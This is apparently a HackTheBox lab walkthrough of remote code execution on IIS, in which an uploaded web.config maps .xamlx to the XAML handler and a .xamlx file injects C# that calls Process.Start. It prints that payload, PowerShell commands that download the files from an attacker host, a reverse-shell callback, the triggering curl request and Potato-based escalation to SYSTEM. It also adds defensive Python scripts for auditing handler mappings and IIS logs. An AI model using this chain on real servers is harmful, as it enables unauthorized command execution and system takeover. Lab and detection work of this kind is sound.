Remote Code Execution in IIS Servers with XAMLX files

In this article I will be going through a technique which allows us to execute commands on MS IIS servers when the usual script extensions such as .ASP and .ASPX are disabled.

For this demo I will be using the StreamIO box from HackTheBox. This was a Medium-difficulty Windows box which had an unintended privilege escalation path to Administrator using this technique.

NOTE: This unintended path was originally showcased by xct in his walkthrough of the box.

What is an XAMLX file?

An XAMLX file is a declarative workflow service: a XAML document (Windows Workflow Foundation, .NET Framework 4.x) that describes the activities of a WCF service, including the messages it receives and sends, so that the service can be hosted without any compiled code-behind. When IIS has the XAML HTTP handler mapped to the .xamlx extension, a request for the file makes the server parse the document, build the workflow and host it as a web service.

That build step is what makes the file dangerous: a XAMLX file may contain C# expressions, which the workflow host compiles and runs on the server when the service is loaded. Anyone who can place a .xamlx file in a location IIS serves through that handler can therefore execute system commands with the rights of the IIS worker process.

Prerequisites for the Attack

For this attack to be possible we need a way to upload or write files to the web root (C:\inetpub\wwwroot) of the IIS server. The .xamlx extension must also be mapped to the XAML HTTP handler: either the HTTP Activation feature of WCF Services (under .NET Framework 4.x Features) is already installed, which registers that mapping server-wide, or we register the mapping ourselves.

In our case we will enable the extension by uploading a new web.config to the web root. A site-level web.config can add entries to the <handlers> section, so we tell IIS to map *.xamlx to the XAML handler. The two entries below are the same ones HTTP Activation would normally register, one for the integrated pipeline and one for classic mode:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers>
      <add name="xamlx" path="*.xamlx" verb="*" type="System.Xaml.Hosting.XamlHttpHandlerFactory, System.Xaml.Hosting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" modules="ManagedPipelineHandler" requireAccess="Script" preCondition="integratedMode" />
      <add name="xamlx-Classic" path="*.xamlx" verb="*" modules="IsapiModule" scriptProcessor="%windir%\Microsoft.NET\Framework64\v4.0.30319\aspnet_isapi.dll" requireAccess="Script" preCondition="classicMode,runtimeVersionv4.0,bitness64" />
    </handlers>
  </system.webServer>
</configuration>

Two things to check before relying on this: if the web root already contains a web.config, overwriting it changes the site's behaviour (merge the <handlers> entries into the existing file instead), and if an administrator has locked the handlers section at the server level, IIS refuses the override with a 500.19 configuration error rather than serving the new mapping.
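The defender's counterpart to the step above is to find handler mappings that a site-level web.config should not be adding. The following Python script is an added example, not code from the original post: it parses a web.config and reports every handler whose path is outside an allow-list and which dispatches to an executing module. The sample config is constructed here and contains the two .xamlx entries quoted above plus a benign static-file handler; the allow-list of expected paths and the set of executing modules are assumptions to tune per server.

```python
"""Audit an IIS web.config for handler mappings that route extra file
extensions into the managed (ASP.NET / ISAPI) pipeline.

Added example for this article, not from the original post.
"""
import xml.etree.ElementTree as ET

# Constructed sample: the kind of web.config an attacker drops into the web
# root. The two xamlx entries are the ones quoted in the article; the first
# entry is a harmless static-file mapping used as a control.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.webServer>
    <handlers>
      <add name="StaticHtml" path="*.html" verb="GET,HEAD" modules="StaticFileModule" resourceType="File" />
      <add name="xamlx" path="*.xamlx" verb="*" type="System.Xaml.Hosting.XamlHttpHandlerFactory, System.Xaml.Hosting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" modules="ManagedPipelineHandler" requireAccess="Script" preCondition="integratedMode" />
      <add name="xamlx-Classic" path="*.xamlx" verb="*" modules="IsapiModule" scriptProcessor="%windir%\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_isapi.dll" requireAccess="Script" preCondition="classicMode,runtimeVersionv4.0,bitness64" />
    </handlers>
  </system.webServer>
</configuration>
"""

# Modules that hand the request to code rather than serving file bytes.
# Assumption: this set is what counts as "executing" on the audited server.
EXECUTING_MODULES = {"ManagedPipelineHandler", "IsapiModule", "CgiModule", "FastCgiModule"}


def find_handler_adds(config_xml):
    """Return (name, path, modules, handler) for every <handlers><add> element.

    'handler' is the managed type (integrated mode) or the scriptProcessor
    (classic/ISAPI mode), whichever the entry carries.
    """
    root = ET.fromstring(config_xml)
    results = []
    for add in root.iterfind("./system.webServer/handlers/add"):
        handler = add.get("type") or add.get("scriptProcessor") or ""
        results.append((add.get("name", ""), add.get("path", ""),
                        add.get("modules", ""), handler))
    return results


def risky_handlers(config_xml, expected_paths):
    """Flag handlers that map a path outside expected_paths AND dispatch to
    an executing module. A site-level web.config adding such an entry is
    exactly the step the article relies on.

    expected_paths: set of lower-case path patterns that are legitimately
    executable on this site, e.g. {"*.aspx"}.
    """
    flagged = []
    for name, path, modules, handler in find_handler_adds(config_xml):
        if path.lower() in expected_paths:
            continue
        module_set = {m.strip() for m in modules.split(",") if m.strip()}
        if module_set & EXECUTING_MODULES:
            flagged.append((name, path, handler))
    return flagged


if __name__ == "__main__":
    # Site that is only supposed to run .aspx and serve .html
    for name, path, handler in risky_handlers(SAMPLE_WEB_CONFIG, {"*.aspx", "*.html"}):
        print(f"[!] handler '{name}' maps {path} to {handler}")
```

Run it against every web.config under a web root, not just the top-level one, since a mapping in a subfolder's web.config applies to that folder. The matching hardening is to lock the section at the server level (appcmd lock config /section:system.webServer/handlers), after which a site-level web.config that tries to add a mapping yields a 500.19 configuration error instead of a working handler.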

Once that is done we need to create the XAMLX file that will execute commands for us. It is an XML document; inside it we use the <mca:CSharpValue> element, a C# expression activity whose body is spliced into C# source that the workflow host generates and compiles when the service is loaded (the mca: and sd: prefixes are XML namespace prefixes declared on the file's root element, mapping to the Microsoft.CSharp.Activities and System.Diagnostics CLR namespaces). The payload below is written so that the generated source still compiles once the text is spliced in, with a class member whose initialiser calls Process.Start(...), so the command runs as soon as the service is activated:

<mca:CSharpValue x:TypeArguments="sd:Process">/*/System.Diagnostics.Process.Start("");return base.RewriteExpressionTree(expression);}
System.Diagnostics.Process x = System.Diagnostics.Process.Start("cmd.exe", "/c calc");
[System.Diagnostics.DebuggerHiddenAttribute()]
public System.Diagnostics.Process @__Expr0Get() {return x;</mca:CSharpValue>

You can find the full versions of the XAMLX file and the web.config file below.

In the a.xamlx file I used a base64-encoded PowerShell payload in place of the calc example above, to get a reverse shell to a listener on 10.10.14.43:9090. Make sure you edit the payload (command, IP and port) accordingly.

Exploitation

I have a low-privileged shell on the box as the yoshihide user, with no interesting privileges:

whoami /priv

But this user has write access over the web root of the IIS server:

icacls C:\inetpub\wwwroot

Now we need to upload the XAMLX file and the web.config to the web root. I am hosting them on my web server on port 8080 and will use iwr (Invoke-WebRequest) to transfer the files:

powershell iwr http://10.10.14.43:8080/web.config -outfile \inetpub\wwwroot\web.config
powershell iwr http://10.10.14.43:8080/a.xamlx -outfile \inetpub\wwwroot\a.xamlx

After the files are in place, we need to send a POST request to our XAMLX file. Two things to keep in mind: set the Content-Type to text/xml and set a SOAPAction header. The SOAPAction value does not need to match a real operation (an arbitrary value such as testme works); it only has to make the request look like a SOAP call so that the WCF host loads the service, which is when the embedded C# is compiled and run.

curl http://streamio.htb/a.xamlx -X POST \
-H 'Content-Type: text/xml' \
-H 'SOAPAction: testme' \
-d '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body/></s:Envelope>'

Once I executed the curl command I got a connection back to my listener, but it was still running as the yoshihide user. However, if we look at the privileges of this new shell, we now have SeImpersonatePrivilege. The difference is that this shell lives inside the IIS worker process (w3wp.exe), whose token includes groups such as IIS_IUSRS that are granted "Impersonate a client after authentication" by default policy, so the same account holds a privilege it lacked in the earlier shell.

SeImpersonatePrivilege can be abused with one of the Potato family of tools (JuicyPotato, SweetPotato) to obtain a shell as NT AUTHORITY\SYSTEM. Note that JuicyPotato does not work on Windows Server 2019 / Windows 10 1809 and later; SweetPotato or PrintSpoofer cover those versions.
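The request that triggers the code execution leaves a trace in the IIS access log, and this is where a defender would look for the technique described in this section. The following Python script is an added example, not part of the original post: it parses IIS W3C extended log lines, taking the column layout from the #Fields header so it works with any configured field set, and flags every request for a .xamlx file, distinguishing the successful POST that actually compiles and runs the embedded C# from GET probes. The log lines are constructed, using documentation IP ranges, and the extension list is an assumption to extend if the site hosts other WCF endpoints.

```python
"""Scan IIS W3C extended log lines for requests to .xamlx workflow services.

Added example for this article, not from the original post.
"""

# Assumption: a site that deploys no workflow services should never see
# requests for these extensions.
SUSPICIOUS_EXTENSIONS = (".xamlx",)

# Constructed log excerpt (IIS replaces spaces in logged values with '+',
# so every field is a single token). The 404.8 on web.config is IIS's
# hidden-segment block, shown here to illustrate what is NOT flagged.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2022-06-05 10:00:01 198.51.100.10 GET /index.html - 80 - 192.0.2.7 Mozilla/5.0 - 200 0 0 15
2022-06-05 10:00:04 198.51.100.10 GET /a.xamlx - 80 - 192.0.2.7 Mozilla/5.0 - 200 0 0 410
2022-06-05 10:00:09 198.51.100.10 POST /a.xamlx - 80 - 192.0.2.7 curl/7.83.1 - 200 0 0 1503
2022-06-05 10:00:12 198.51.100.10 GET /web.config - 80 - 192.0.2.7 curl/7.83.1 - 404 8 0 3
"""


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields directive.

    The field list can change mid-file (IIS writes a new directive block
    after a config change), so the header is re-read whenever it appears.
    """
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#") or fields is None:
            continue  # other directive, or data before any #Fields header
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # truncated or malformed line: skip rather than misalign columns
        yield dict(zip(fields, values))


def find_xamlx_requests(text):
    """Return (client_ip, method, uri, status, stage) for every request whose
    path ends in a suspicious extension.

    stage is 'trigger' for a successful POST, the request that makes the
    WCF host compile and run the embedded C#, and 'probe' for anything else
    (GETs fetching the service page, failed POSTs).
    """
    hits = []
    for rec in parse_w3c(text):
        uri = rec.get("cs-uri-stem", "")
        if not uri.lower().endswith(SUSPICIOUS_EXTENSIONS):
            continue
        method = rec.get("cs-method", "")
        status = rec.get("sc-status", "")
        stage = "trigger" if method == "POST" and status == "200" else "probe"
        hits.append((rec.get("c-ip", ""), method, uri, status, stage))
    return hits


if __name__ == "__main__":
    for ip, method, uri, status, stage in find_xamlx_requests(SAMPLE_LOG):
        print(f"[{stage}] {ip} {method} {uri} -> {status}")
```

IIS does not log the SOAPAction header by default, but on IIS 8.5 and later a request header can be added as a custom logging field, which lets you alert specifically on SOAP calls to a site that hosts no workflow services. Pair this with file-integrity monitoring on web.config under the web root, since the handler mapping is the other half of the technique.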


Kavishka Gihan

Cyber Security Student | Machine author in @hackthebox | find me on instagram @_kavi.gihan